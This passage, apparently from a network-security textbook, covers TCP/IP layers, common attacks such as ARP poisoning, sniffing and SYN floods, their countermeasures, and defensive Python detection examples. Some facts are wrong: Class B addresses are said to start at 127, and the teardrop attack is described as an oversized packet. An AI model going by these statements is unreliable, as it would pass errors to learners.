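import re
from collections import defaultdict

# One cache entry line: IPv4 address, dash-separated MAC, entry type.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.I,
)

# Constructed sample: the host at .121 is also answering for the gateway's
# IP (.254) with its own MAC, which is what a poisoned cache looks like.
SAMPLE_ARP_OUTPUT = """
Interface: 192.168.123.114 --- 0x4
  Internet Address      Physical Address      Type
  192.168.123.121       00-11-22-33-44-55     dynamic
  192.168.123.130       00-23-4d-70-af-20     dynamic
  192.168.123.254       00-11-22-33-44-55     dynamic
"""

# Baseline recorded when the network was known to be clean (constructed).
KNOWN_GOOD = {"192.168.123.254": "00-1c-10-f5-61-9c"}


def parse_arp_table(text: str) -> dict:
    """Return {ip: (mac, type)} for every entry line in the listing;
    interface and column-header lines do not match and are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, typ = m.groups()
            table[ip] = (mac.lower(), typ.lower())
    return table


def find_arp_anomalies(table: dict, known_good: dict) -> list:
    """Two checks a defender can run on a host's cache:
    1. one MAC claiming more than one IP (classic poisoning footprint);
    2. a critical entry (e.g. the default gateway) whose MAC differs from
       the recorded baseline."""
    findings = []
    by_mac = defaultdict(list)
    for ip, (mac, _) in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac, sorted(ips)))
    for ip, expected in known_good.items():
        if ip in table and table[ip][0] != expected.lower():
            findings.append(("gateway-mac-changed", ip, table[ip][0]))
    return findings


if __name__ == "__main__":
    for finding in find_arp_anomalies(parse_arp_table(SAMPLE_ARP_OUTPUT), KNOWN_GOOD):
        print(finding)
```

A static entry added with arp -s, as the note above describes, pins the gateway mapping on the host so a forged reply cannot overwrite it; on managed switches the same protection is usually provided centrally by a dynamic ARP inspection feature. Either way, the cache check is a cheap thing to run from a host when traffic suddenly starts taking an unexpected path.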
Although both provide the ability to transmit data over serial links, PPP is more robust than SLIP and has therefore displaced SLIP in many implementations. For the most part, SLIP is seen only in very specific environments and deployments, such as older networks.

# Physical Layer Threats

Several security threats exist at this layer. Before security professionals can understand how to defend against them, they must first understand the attacks. Some common threats found at this layer include the following:

• Spoofing MAC addresses — Hackers can use a wide variety of programs to spoof MAC addresses, or even use the features built into an operating system to change their MAC. By spoofing MAC addresses, attackers can bypass 802.11 wireless controls, or the controls that switches enforce when they are used to control traffic by locking ports to specific MAC addresses.
• Wiretapping — The act of covertly monitoring Internet and telephone conversations by a third party. In essence, this attack requires you to tap into a cable for a wired network, but can involve listening in on a wireless network.
• Interception — Packet sniffers are one of the primary means of intercepting network traffic.
• Eavesdropping — The unauthorized capture and reading of network traffic.

# Physical Layer Controls

In order to protect against physical layer attacks, some simple countermeasures can be employed:

• Fiber cable — The choice of transmission media can make a tremendous difference in the types of attacks that can be carried out and how difficult those attacks may be. For example, fiber is more secure than the wired alternatives and also more secure than wireless transmission methods.
• Wired Equivalent Privacy (WEP) — WEP was an early attempt to add security to wireless networking. Although it is true that wireless networks can offer a level of security, this security is considered weak by today's standards. WEP has been largely replaced in favor of WPA and WPA2.
In practice it should be used only in noncritical deployments, if at all.
• Wi-Fi Protected Access (WPA) — WPA was introduced as a more secure and more robust overall alternative to WEP and has proven to be more secure than WEP in practice.
• Wi-Fi Protected Access 2 (WPA2) — WPA2 is an upgrade that adds several improvements over WPA, including encryption protocols such as Advanced Encryption Standard (AES) and Temporal Key Integrity Protocol (TKIP) as well as better key management than WPA.
• Point-to-Point Tunneling Protocol (PPTP) — PPTP is widely used for virtual private networks (VPNs). PPTP is composed of two components: the transport that maintains the virtual connection and the encryption that ensures confidentiality.
• Challenge Handshake Authentication Protocol (CHAP) — CHAP is an improvement over previous authentication protocols such as Password Authentication Protocol (PAP), in which passwords were sent in cleartext.

# Internetwork Layer

The next layer is the internetwork layer, which maps to Layer 3 of the OSI reference model.

# Internetwork Layer Equipment

The primary piece of equipment located at the internetwork layer is the router. Routers differ from switches found at the lower layers in that they direct traffic using logical addresses as opposed to the physical addresses used by switches. Furthermore, routers are meant to move traffic between different networks, forming paths to direct traffic between multiple networks. Routers allow packets to flow from the source device's network to the destination device's network. Points to remember about routers include the following:

• Does not forward broadcast packets
• Forwards multicast packets
• Has highest latency
• Has most flexibility
• Makes forwarding decisions on the basis of destination IP address
• Requires configuration

[FIGURE 2-6 IP header. Bit positions 0, 16, and 31 across the top; the IP header is followed by the data (TCP segment). Fields: Version | IHL | Differentiated Services | Total Length; Identification | Flags | Fragment Offset; Time to Live | Protocol | Header Checksum; Source IP address; Destination IP address; Options | Padding; Data.]

Routers are also known as edge devices because of their placement at the point where multiple networks come together. Routers rely on items known as routing protocols to ensure that traffic gets to the correct location.

# Routing Protocols

The aforementioned routing protocols determine the best path on which to send traffic at a point in time. The two best examples of routing protocols are Routing Information Protocol (RIP) and Open Shortest Path First (OSPF).

Routers are optimized to perform the vital function of routing traffic between networks and ensuring that traffic reaches its intended destination. When receiving a packet, a router examines the header of the packet (see Figure 2-6) with specific emphasis on the address the packet is addressed to. Once this is located, the router can consult a routing table to determine where to send the information. Routing tables contain information that allows a router to quickly look up the best path that can be used to send the information. Routing tables are updated on a regular schedule in order to ensure that the information contained within them is accurate and accounts for changing network conditions.

A router can be configured either statically or dynamically, depending on the requirements in a given situation. Static routing uses a routing table that has been created by a network administrator who is knowledgeable about the layout of the network and enters this information manually into the routing table. Static routing is used mainly on small networks; it quickly loses its utility on larger networks because the manual updates would take increasing amounts of effort to keep up to date. Dynamic routing represents the more commonly used option in networks and routing tables. Dynamic routing uses a combination of factors to update the table automatically and the same factors to determine at any time where to send the information in question. Dynamic routing protocols include RIP, Border Gateway Protocol (BGP), Interior Gateway Routing Protocol (IGRP), and OSPF.

Within the protocols marked as dynamic routing are two subcategories known as distance vector and link-state routing. The basic methodology of a distance vector protocol is to make a decision on what is the best route by determining the shortest path. The shortest path is commonly calculated by what are known as hops. RIP is an example of a distance vector routing protocol. RIP has several issues from a security standpoint:

• Broadcasts all data
• Is subject to route poisoning
• Has no authentication
• Might not choose the best path

A hop count describes the number of routers that a packet must pass through, or traverse, to reach its destination. Each time a packet passes through a router one hop is made, and in routing terms a hop is added to the hop count. RIP is the most common routing protocol that uses a hop count as its primary routing metric. Hop counts have some disadvantages over protocols that use distance vectors in that the path with the lowest number of hops may not be the optimum route. The lower hop count path may have considerably less bandwidth than the higher hop count route. Link state calculates the best path to a target network by one or more metrics such as delay, speed, or bandwidth. Once this path has been determined, the router will inform other routers what it has discovered.
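The point that the fewest-hop path is not necessarily the best one, as an added example that is not part of the original text: a small constructed topology in which the direct link is slow and the three-hop path is fast, with the same shortest-path computation run once under a hop-count metric (the distance vector view) and once under a bandwidth-based cost (the link-state view). The router names, link speeds, and the cost formula "reference bandwidth divided by link bandwidth" are assumptions made for the example.

```python
"""Why the fewest hops is not always the best path: compare a hop-count
metric (distance vector, RIP style) with a link-state metric that weighs
each link by its bandwidth.

Added example, not part of the original text. The topology and link speeds
are constructed; the per-link cost REFERENCE_BW / bandwidth is an assumed
formula chosen so that a faster link costs less."""
import heapq

# Constructed topology: {router: {neighbour: link bandwidth in Mbit/s}}.
# A reaches D either directly over a 10 Mbit/s link or via B and C over
# 1000 Mbit/s links.
TOPOLOGY = {
    "A": {"B": 1000, "D": 10},
    "B": {"A": 1000, "C": 1000},
    "C": {"B": 1000, "D": 1000},
    "D": {"A": 10, "C": 1000},
}
REFERENCE_BW = 1000  # Mbit/s: a 1000 Mbit/s link costs 1, a 10 Mbit/s link costs 100


def shortest_path(graph, src, dst, cost_fn):
    """Dijkstra over the topology; cost_fn(bandwidth) gives the per-link cost.
    Returns (total_cost, [routers on the path]) or (inf, []) if unreachable."""
    dist = {src: 0}
    prev = {}
    heap = [(0, src)]
    while heap:
        d, node = heapq.heappop(heap)
        if d > dist.get(node, float("inf")):
            continue                      # stale heap entry
        if node == dst:
            break
        for nbr, bw in graph[node].items():
            nd = d + cost_fn(bw)
            if nd < dist.get(nbr, float("inf")):
                dist[nbr] = nd
                prev[nbr] = node
                heapq.heappush(heap, (nd, nbr))
    if dst not in dist:
        return float("inf"), []
    path, cur = [dst], dst
    while cur != src:
        cur = prev[cur]
        path.append(cur)
    return dist[dst], path[::-1]


def hop_count_path(graph, src, dst):
    """Distance-vector view: every link costs exactly one hop."""
    return shortest_path(graph, src, dst, lambda bw: 1)


def bandwidth_cost_path(graph, src, dst):
    """Link-state view: slow links cost more, so the path with the best
    end-to-end bandwidth wins even though it crosses more routers."""
    return shortest_path(graph, src, dst, lambda bw: REFERENCE_BW / bw)


if __name__ == "__main__":
    print("hop count :", hop_count_path(TOPOLOGY, "A", "D"))
    print("bandwidth :", bandwidth_cost_path(TOPOLOGY, "A", "D"))
```

Under the hop-count metric A sends traffic for D straight over the 10 Mbit/s link (one hop); under the bandwidth-based metric the same algorithm picks A, B, C, D at a total cost of 3 versus 100 for the direct link. The security angle is the same in both cases: whichever metric is in use, a forged advertisement that lowers a path's apparent cost redirects traffic, which is why the lack of authentication in RIP listed above matters.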
Link state routing is considered more flexible and robust than distance vector routing protocols. OSPF is the most common link state routing protocol and is used as a replacement for RIP in most large-scale deployments. OSPF was developed in the mid-1980s to overcome the problems associated with RIP. Although RIP works well when networks are small in size, it rapidly loses its advantages when the network scales up in size. OSPF has several built-in advantages over RIP that include the following:

• Security
• The use of IP multicasts to send out router updates
• Unlimited hop count
• Better support for load balancing
• Fast convergence

# Internetwork Layer Protocols

The most important protocol in the TCP/IP suite is IP because of its central role in addressing and routing. It is a routable protocol that has the role of making a best effort at delivering information. IP organizes data into a packet, prepares it for delivery, and places a source and destination address on the packet. Additionally, IP is responsible for adding information known as the Time to Live (TTL) to a packet. The goal of a TTL is to keep packets from traversing the network forever. If the recipient cannot be found, rather than traveling the network forever, the packet can eventually be discarded.

Taking a closer look at the important IP address, some details start to emerge that reveal how routing and other functions take place. One part of the IP address refers to the network, and the other refers to the host. In layman's terms, the network is equivalent to the street in a postal address, and the host is the house number on a given street. Combined, they allow you to communicate with any network and any host in the world that is connected to the Internet.

IP addresses are laid out in a dotted decimal notation format that divides the address up into four groups of numbers representing 8 bits apiece.
IPv4 lays out addresses in a four-decimal-number format separated by decimal points. Each of these decimal numbers is 1 byte long, allowing numbers to range from 0-255. You can tell the class of an IP address by looking at the first octet. An example of IPv4 addressing is shown here:

| Class | IP address begins with |
| --- | --- |
| A | 1-126 |
| B | 127-191 |
| C | 192-223 |
| D | 224-239 |
| E | 240-255 |

Each of the classes is designed to divide up the number of networks and hosts, with larger or smaller networks being possible depending on the class. A Class A network offered the fewest networks with the greatest number of hosts, with Class C offering the opposite. Classes D and E are used for different purposes that this chapter will not discuss.

NOTE: Each section of an IP address separated by a decimal is commonly known as an octet, which comes from the binary notation used to represent it. Any number present in an IP address (0-255) can be represented by a sequence of eight ones and zeros.

A number of addresses have been reserved for private use. These addresses are nonroutable, which means that manufacturers of routers program them not to propagate network traffic from these address ranges onto the Internet. Traffic within these address ranges routes normally. Address ranges set aside as nonroutable, private addresses, including their respective subnet masks, are:

| Class | Address range | Default subnet mask |
| --- | --- | --- |
| A | 10.0.0.0-10.255.255.255 | 255.0.0.0 |
| B | 172.16.0.0-172.31.255.255 | 255.255.0.0 |
| C | 192.168.0.0-192.168.255.255 | 255.255.255.0 |

NOTE: A good example of an attack against IP is what is known as a teardrop attack. Malformed fragments can crash or hang older operating systems that have not been patched. Specifically, in this attack a packet is transmitted to a system that is larger than the system can handle, resulting in a crash.

Many home routers use a default address of 192.168.0.1 or 192.168.1.1. This means that a home network is nonroutable "right out of the box," which is a very desirable security feature.

Also located at the internetwork layer is the Internet Control Message Protocol (ICMP), which was designed for network diagnostics and to report logical errors. TCP/IP environments must support ICMP because it is an essential service for network management. ICMP provides error reporting and diagnostics, and ICMP messages follow a basic format. The first byte of an ICMP header indicates the type of ICMP message. The byte following contains the code for each particular type of ICMP. Eight of the most common ICMP types are shown here:

| ICMP type | Code | Function |
| --- | --- | --- |
| 0/8 | 0 | Echo Response/Request (Ping) |
| 3 | 0-15 | Destination Unreachable |
| 4 | 0 | Source Quench |
| 5 | 0-3 | Redirect |
| 11 | 0-1 | Time Exceeded |
| 12 | 0 | Parameter Fault |
| 13/14 | 0 | Timestamp Request/Response |
| 17/18 | 0 | Subnet Mask Request/Response |

NOTE: Ping gets its name from the distinctive "pinging" noise made by sonar in ships and submarines to locate other vessels that may be lurking nearby. A ping from a sonar device bounces a sound off the hull of a ship as an echo, letting the sender know where the lurker happens to be.

The most common tool used by network administrators associated with ICMP is ping, which is useful in determining whether a host is up. It is also useful for attackers because they can use it to enumerate a system (it can help the hacker determine whether a computer is online).

# Internetwork Layer Threats

One threat that will be discussed more in depth later in this text is known as a sniffer (also commonly referred to as a protocol analyzer). Sniffers are hardware- or software-based devices that are used to view and/or record traffic that flows over the network.
Sniffers are useful and problematic at the same time because network traffic that might include sensitive data can be viewed through the use of a sniffer. It is not uncommon for corporate IT departments to specifically deny the use of sniffers except by those specifically authorized to use them. Sniffers pose a real risk in that a less-than-ethical individual might intercept a password or other sensitive information in clear text and use it later for some unauthorized purpose.

In order to realize the full potential of a sniffer, certain conditions have to be in place; most important is the ability for a network card to be put into promiscuous mode. In other words, the card can view all traffic moving past it rather than just the traffic destined for it. There are programs to accomplish this for Linux and Windows users. Linux users can download libpcap at http://sourceforge.net/projects/libpcap. Windows users need to install the WinPcap library, available at http://www.winpcap.org. Just remember that promiscuous mode allows a sniffer to capture any packet it can see, not just packets addressed to the device.

Next, you have to install a sniffer. The most widely used sniffer is known as Wireshark. Wireshark has gained popularity because it is free, easy to use, and works as well as or better than most commercial sniffing tools. Wireshark, just like other sniffers, comprises three displays or windows. To get an idea of what the display looks like, look at Figure 2-7.

[FIGURE 2-7 Wireshark. Packet list pane: frames numbered around 1941-1957 between 192.168.123.114, 192.168.123.254 and external hosts, mostly DNS standard queries and TCP segments to and from port http. Packet details pane for the selected Frame 1948 (85 bytes on wire, 85 bytes captured): Ethernet II, Src: 00:1a:70:11:c4:3c, Dst: 00:1c:10:f5:61:9c; Internet Protocol, Src: 192.168.123.114, Dst: 192.168.123.254; User Datagram Protocol, Src Port: 56956, Dst Port: domain (53); Domain Name System (query). Packet bytes pane: the hex dump of the frame.]

At the top of the figure, you can see a number of packets that have been captured. In the middle of the figure, you can see the one packet that has been highlighted for review. At the bottom of the figure, you can see the contents of the individual frame. If you want to learn more about sniffers, Wireshark is a good place to start. It can be downloaded from www.wireshark.org.

# Internetwork Layer Controls

Moving up the TCP/IP stack, the following controls are useful at the internetwork layer.

• IPSec — The most widely used standard for protecting IP datagrams is IPSec. IPSec can be at or above the internetwork layer. IPSec can be used by applications and is transparent to end users. IPSec addresses two important security problems with data in transit: keeping the data confidential and maintaining its integrity.
• Packet filters — Packet filtering is configured through access control lists (ACLs). ACLs enable rule sets to be built that will allow or block traffic based on header information.
As traffic passes through the router, each packet is compared with the rule set, and a decision is made as to whether the packet will be permitted or denied.
• Network address translation (NAT) — Originally developed to address the growing need for IP addresses (discussed in Request for Comments [RFC] 1631), NAT can be used to translate between private and public addresses. Private IP addresses are those that are considered unroutable. Being unroutable means that public Internet routers will not route traffic to or from addresses in these ranges. A small measure of security is added by using NAT.

# Host-to-Host Layer

The host-to-host layer provides end-to-end delivery. This layer segments the data and adds a checksum in order to properly validate data to ensure that it has not been corrupted. A decision must be made here to send the data with TCP or UDP, depending on the specific application.

# Host-to-Host Layer Protocols

The primary job of the host-to-host transport layer is to facilitate end-to-end communication. This layer is often referred to as the transport layer. The following sections describe the two protocols at this layer:

• TCP
• UDP

TCP provides reliable data delivery services and is a connection-oriented protocol. TCP provides reliable data delivery, flow control, sequencing, and a means to handle startups and shutdowns. TCP also uses a three-step handshake to start a session. During the data-transmission process, TCP guarantees delivery of data by using sequence and acknowledgment numbers. At the completion of the data-transmission process, TCP performs a four-step shutdown that gracefully concludes the session. The startup sequence is shown in Figure 2-8. TCP has a fixed packet structure (see Figure 2-9).
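The sniffer display of Figure 2-7 and the packet-filter ACL described under "Internetwork Layer Controls" are two views of the same header fields, so one added example serves both (it is not code from the original text or from Wireshark): a frame is decoded layer by layer, Ethernet II, then IPv4 with its header checksum verified, then UDP, then the DNS query name, and the decoded header is run through a small ACL whose last rule denies everything. The frame bytes are constructed, not the capture from the page; they reuse the MAC addresses, IP addresses, and ports shown in the figure, the query name is what the capture appears to show, and the ACL rules are sample values.

```python
"""What a sniffer shows and what a packet filter decides: decode an
Ethernet/IPv4/UDP/DNS frame (the layers in Figure 2-7's detail pane), then
run the decoded header through a simple ACL with a final deny-all rule.

Added example, not from the original text or from Wireshark. The frame
bytes are constructed; addresses, ports and ACL rules are sample values."""
import struct

# ---- constructed sample frame: Ethernet II / IPv4 / UDP / DNS query -------
DNS_QNAME = b"\x0cgooglephotos\x08blogspot\x03com\x00"      # label-encoded name
DNS_PAYLOAD = (struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)  # id, RD, 1 question
               + DNS_QNAME + struct.pack("!HH", 1, 1))             # QTYPE A, QCLASS IN
UDP_HDR = struct.pack("!HHHH", 56956, 53, 8 + len(DNS_PAYLOAD), 0)


def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words; a header that verifies sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


_IP_NO_SUM = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(UDP_HDR) + len(DNS_PAYLOAD),
                         0x7BF2, 0, 128, 17, 0,
                         bytes([192, 168, 123, 114]), bytes([192, 168, 123, 254]))
IP_HDR = _IP_NO_SUM[:10] + struct.pack("!H", internet_checksum(_IP_NO_SUM)) + _IP_NO_SUM[12:]
SAMPLE_FRAME = (bytes.fromhex("001c10f5619c") + bytes.fromhex("001a7011c43c")  # dst, src
                + b"\x08\x00" + IP_HDR + UDP_HDR + DNS_PAYLOAD)


def decode_dns_qname(data: bytes) -> str:
    """DNS names are length-prefixed labels terminated by a zero byte."""
    labels, i = [], 0
    while data[i]:
        n = data[i]
        labels.append(data[i + 1:i + 1 + n].decode("ascii"))
        i += 1 + n
    return ".".join(labels)


def decode_frame(frame: bytes) -> dict:
    """Peel the headers in the order encapsulation added them."""
    dst_mac, src_mac = frame[:6], frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not IPv4")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if internet_checksum(ip[:ihl]) != 0:
        raise ValueError("bad IP header checksum")
    info = {"src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
            "src_ip": ".".join(map(str, ip[12:16])), "dst_ip": ".".join(map(str, ip[16:20])),
            "ttl": ip[8], "proto": ip[9], "total_len": struct.unpack("!H", ip[2:4])[0]}
    if info["proto"] == 17:                                      # UDP
        sport, dport, _ulen, _sum = struct.unpack("!HHHH", ip[ihl:ihl + 8])
        info.update(src_port=sport, dst_port=dport)
        if dport == 53:                                          # skip 12-byte DNS header
            info["dns_qname"] = decode_dns_qname(ip[ihl + 8 + 12:])
    return info


# ---- packet filter: first matching rule wins; the last rule denies all ----
ACL = [
    {"action": "permit", "proto": 17, "dst_ip": "192.168.123.254", "dst_port": 53},
    {"action": "permit", "proto": 6, "dst_port": 443},
    {"action": "deny"},                                          # deny-all catch-all
]


def acl_decision(pkt: dict, acl=ACL) -> str:
    """Compare the decoded header with each rule in order, as a router does."""
    for rule in acl:
        if all(pkt.get(k) == v for k, v in rule.items() if k != "action"):
            return rule["action"]
    return "deny"


if __name__ == "__main__":
    decoded = decode_frame(SAMPLE_FRAME)
    print(decoded)
    print("ACL decision:", acl_decision(decoded))
```

The constructed frame comes out at 85 bytes, the same length Wireshark reports for the selected frame in Figure 2-7, and a filter that only sees these header fields has no way to tell a legitimate DNS query from data tunnelled inside one; that is the limit of header-based ACLs and the reason application-layer inspection exists.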
Port scanners can tweak TCP flags and send them in packets that should not normally exist in an attempt to elicit a response from a targeted server. Like TCP, UDP belongs to the host-to-host layer. Unlike TCP, UDP is a connectionless transport service. UDP does not have startup, shutdown, or any handshaking processes like those performed by TCP. Because there is no handshake with UDP, it is harder to scan and enumerate. Although this makes it less reliable, it does offer the benefit of speed. UDP is optimized for applications that require fast delivery and are not sensitive to packet loss. UDP is used by services such as Domain Name Service (DNS).

[FIGURE 2-8 TCP startup and shutdown. Client sends a request for connection (SYN); server sends a response (SYN-ACK); connection established.]

[FIGURE 2-9 TCP frame structure. Bit positions 0, 16, and 31 across the top. Fields: Source Port | Destination Port; Sequence number; Acknowledgment; Header length | Reserved | flag bits (URG, PSH, SYN, ...) | Sliding-window size; Checksum | Urgent pointer; Options | Padding; Data.]

# Host-to-Host Layer Threats

Some of the most common host-to-host layer attacks are shown here:

• Port scanning — A technique in which a message is sent to each port, one at a time. By examining the response, the attacker can determine weaknesses in the applications being probed and determine what to attack.
• Session hijack — A type of attack in which the attacker places himself between the victim and the server. The attack is made possible because authentication typically is done only at the start of a TCP session.
• SYN attack — A SYN attack is a distributed denial of service (DDoS) attack in which the attacker sends a succession of SYN packets with a spoofed return address to a targeted destination IP device, but does not send the last ACK packet to acknowledge and confirm receipt. Eventually, the target system runs out of open connections and cannot accept any new legitimate connection requests.
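The three host-to-host threats just listed each leave a distinct pattern in connection logs, and the following added example (not from the original text) shows the detection side: a port scan appears as one source touching many ports, the "packets that should not normally exist" appear as flag combinations no normal stack sends, and a SYN attack appears as repeated SYNs to one port with no completing ACK. The log format (time, source, destination, destination port, flag letters), the sample lines, and the thresholds are all constructed for the example.

```python
"""Spotting host-to-host layer attacks in connection logs: port scans,
flag combinations that should not normally exist, and SYN floods.

Added example, not from the original text. SAMPLE_LOG is constructed in an
assumed firewall-style format: time src dst dport flags, where the flag
letters are S=SYN A=ACK F=FIN P=PSH U=URG R=RST and '-' means no flags."""
from collections import defaultdict

SAMPLE_LOG = """\
10:00:01 10.0.0.5 192.168.1.10 22 S
10:00:01 10.0.0.5 192.168.1.10 23 S
10:00:01 10.0.0.5 192.168.1.10 25 S
10:00:02 10.0.0.5 192.168.1.10 80 S
10:00:02 10.0.0.5 192.168.1.10 443 S
10:00:02 10.0.0.5 192.168.1.10 3389 S
10:00:03 10.0.0.7 192.168.1.10 80 SF
10:00:03 10.0.0.7 192.168.1.10 80 FPU
10:00:03 10.0.0.7 192.168.1.10 80 -
10:00:04 203.0.113.9 192.168.1.10 80 S
10:00:04 203.0.113.9 192.168.1.10 80 S
10:00:04 203.0.113.9 192.168.1.10 80 S
10:00:04 203.0.113.9 192.168.1.10 80 S
10:00:05 10.0.0.20 192.168.1.10 80 S
10:00:05 10.0.0.20 192.168.1.10 80 A
"""

SCAN_PORT_THRESHOLD = 5      # distinct destination ports from one source
SYN_FLOOD_THRESHOLD = 3      # SYNs from one source to one port, never followed by an ACK

# SYN+FIN, no flags at all, and FIN+PSH+URG are never produced by a normal
# TCP stack; they are the combinations scanners use to probe a host.
ILLEGAL_FLAGS = {"SF", "-", "FPU"}


def parse_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, flags = line.split()
        records.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport), "flags": flags})
    return records


def detect(records: list) -> dict:
    """Return {'port_scan': [srcs], 'illegal_flags': [(src, port, flags)],
    'syn_flood': [srcs]} from a list of parsed records."""
    ports_by_src = defaultdict(set)
    syn_by_src = defaultdict(int)
    ack_by_src = defaultdict(int)
    illegal = []
    for r in records:
        ports_by_src[r["src"]].add(r["dport"])
        if r["flags"] in ILLEGAL_FLAGS:
            illegal.append((r["src"], r["dport"], r["flags"]))
        if r["flags"] == "S":
            syn_by_src[r["src"]] += 1
        if "A" in r["flags"]:
            ack_by_src[r["src"]] += 1
    return {
        "port_scan": sorted(s for s, p in ports_by_src.items() if len(p) >= SCAN_PORT_THRESHOLD),
        "illegal_flags": illegal,
        # half-open pattern: many SYNs to a single port and the source never ACKs
        "syn_flood": sorted(s for s, n in syn_by_src.items()
                            if n >= SYN_FLOOD_THRESHOLD and ack_by_src[s] == 0
                            and len(ports_by_src[s]) == 1),
    }


if __name__ == "__main__":
    for kind, hits in detect(parse_log(SAMPLE_LOG)).items():
        print(kind, hits)
```

The per-source SYN count is the simple case. When the SYN packets carry spoofed return addresses, as the SYN attack description above says, each forged source shows up only once, so the same half-open test has to be applied per destination port instead; the aggregation is the only thing that changes.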
# Host-to-Host Layer Controls

Although the host-to-host layer is where you find TCP and UDP, you need to remember that these protocols are not designed for security. Their goal is reliable or fast delivery. Listed here are some host-to-host security protocols:

• Secure Sockets Layer (SSL) — SSL is considered application independent and can be used with Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Telnet, which run on top of it transparently. SSL uses RSA public key cryptography.
• Transport Layer Security (TLS) — TLS is an upgrade to SSL and is backward compatible, but they do not interoperate. TLS, much like SSL, is designed to be application independent.
• SOCKS — Another security protocol, developed and established by Internet standard RFC 1928. It allows client-server applications to work behind a firewall and utilize their security features.
• Secure RPC (S/RPC) — Adds an additional layer of security onto the RPC process by adding Data Encryption Standard (DES) encryption.

# Application Layer

This section examines the application layer, which maps to OSI Layers 5, 6, and 7. The application layer interacts with applications that need to gain access to network services.

# Application Layer Services

There are many application layer services present at this layer; however, not all are of importance to the security professional. Focus on the services that have the greatest potential for abuse and misuse and therefore represent the greatest threat. Services are assigned a port number. There are 65,535 ports: they are divided into well-known ports (0-1023), registered ports (1024-49151), and dynamic ports (49152-65535). Although there are hundreds of ports and corresponding applications, in practice fewer than 100 are in common use, and of these only a handful will be encountered on a regular basis. The most common of these are shown in Table 2-2.
These are some of the ports that a hacker would first look for on a victim's computer systems. You should practice the deny-all principle and enable just those ports that are needed instead of memorizing each port and deciding whether to block it or not. Simply put, you should block everything and allow only what is needed. If a port is not being used, and deny-all is the practice, it will already be closed.

NOTE: Every firewall is different in respect to configuration, but by default most firewalls have most if not all of their default ports and services disabled. It is up to you, as the security professional, to determine what you need enabled to make the network usable and enable just those features you need to function.

Going back to the earlier issue of TCP/IP being designed when more trust was given to networks, all applications are not created equally. Although some, such as Secure Shell (SSH), are designed to be secure alternatives to Telnet, you might encounter the less secure options in practice. The following list discusses the operation and security issues of some of the common applications:

• DNS — DNS operates on port 53 and performs address translation. DNS serves a critical function in that it converts fully qualified domain names (FQDNs) into numeric IP addresses or IP addresses into FQDNs. DNS uses UDP and TCP.
• FTP — FTP is a TCP service that operates on ports 20 and 21. This application is used to move files from one computer to another. Port 20 is used for the data stream and transfers the data between the client and the server. Port 21 is the control stream and is used to pass commands between the client and the FTP server.
• HTTP — HTTP is a TCP service that operates on port 80. HTTP uses a request-response protocol in which a client sends a request and a server sends a response.
Because HTTP generally runs on Web servers, and Web servers are a very public and exposed asset, the protocol is very commonly exploited by all sorts of threats, including malware.
• Simple Network Management Protocol (SNMP) — SNMP is a UDP service and operates on ports 161 and 162. Some of the security problems that plague SNMP are caused because community strings (which act as a pseudo-password) are passed as cleartext and the default community strings (public/private) are well known. SNMP version 3 is the most current and offers authentication and encryption.
• Telnet — Telnet is a TCP service that operates on port 23. Telnet enables a client at one site to establish a session with a host at another site. The program passes the information typed at the client's keyboard to the host computer system. Telnet sends data, including credentials, in the clear.

TABLE 2-2 Computer ports, services, and protocols.

| PORT | SERVICE | PROTOCOL |
|---|---|---|
| 21 | FTP | TCP |
| 23 | Telnet | TCP |
| 25 | SMTP | TCP |
| 53 | DNS | TCP/UDP |
| 67/68 | DHCP | UDP |
| 69 | TFTP | UDP |
| 79 | Finger | TCP |
| 80 | HTTP | TCP |
| 88 | Kerberos | UDP |
| 110 | POP3 | TCP |
| 111 | SUNRPC | TCP/UDP |
| 135 | MSRPC | TCP/UDP |
| 139 | NB Session | TCP/UDP |
| 161 | SNMP | UDP |
| 162 | SNMP Trap | UDP |
| 389 | LDAP | TCP |
| 443 | SSL | TCP |
| 445 | SMB over IP | TCP/UDP |
| 1433 | MS-SQL | TCP |

• Simple Mail Transfer Protocol (SMTP) — This application is a TCP service that operates on port 25. It is designed for the exchange of electronic mail between networked systems. Spoofing and spamming are two of the vulnerabilities associated with SMTP.
• Trivial File Transfer Protocol (TFTP) — TFTP operates on UDP port 69. It requires no authentication, which can pose a big security risk. It is used to transfer router configuration files and by cable companies to configure cable modems.

Application Layer Threats

Although numerous application layer threats exist, listing all of them is unnecessary.
Some of the more common are briefly listed here to serve as an introduction to in-depth discussions in later chapters:

• Malware — Software developed for the purpose of doing harm. Examples of malware include the following:
  • Trojan — A program that does something undocumented that the programmer or designer intended, but the end user would not approve of if he or she knew about it.
  • Spyware — Any software application that covertly gathers information about a user's activity and reports it to a third party.
  • Virus — A computer program with the capability to generate copies of itself and spread file-to-file. Because viruses usually require the interaction of an individual, they spread relatively slowly. Viruses can have a wide range of effects, from irritating the user to destroying data.
  • Worm — A self-replicating program that spreads by inserting copies of itself into other executable code, programs, or documents. Worms replicate from system to system (instead of file-to-file), and thus spread much more rapidly than viruses. Some worms can flood a network with traffic and result in a DoS attack by consuming bandwidth and other resources.
• DoS — Occurs when an attacker consumes the resources on a target computer for things it was not intended to be doing, thus preventing normal use of network resources for legitimate purposes. Examples of DoS attacks include the following:
  • DoS attack — Although these attacks are known by different names (for example, smurf, SYN flood, and local area network denial (LAND)), each is designed only to disrupt service.
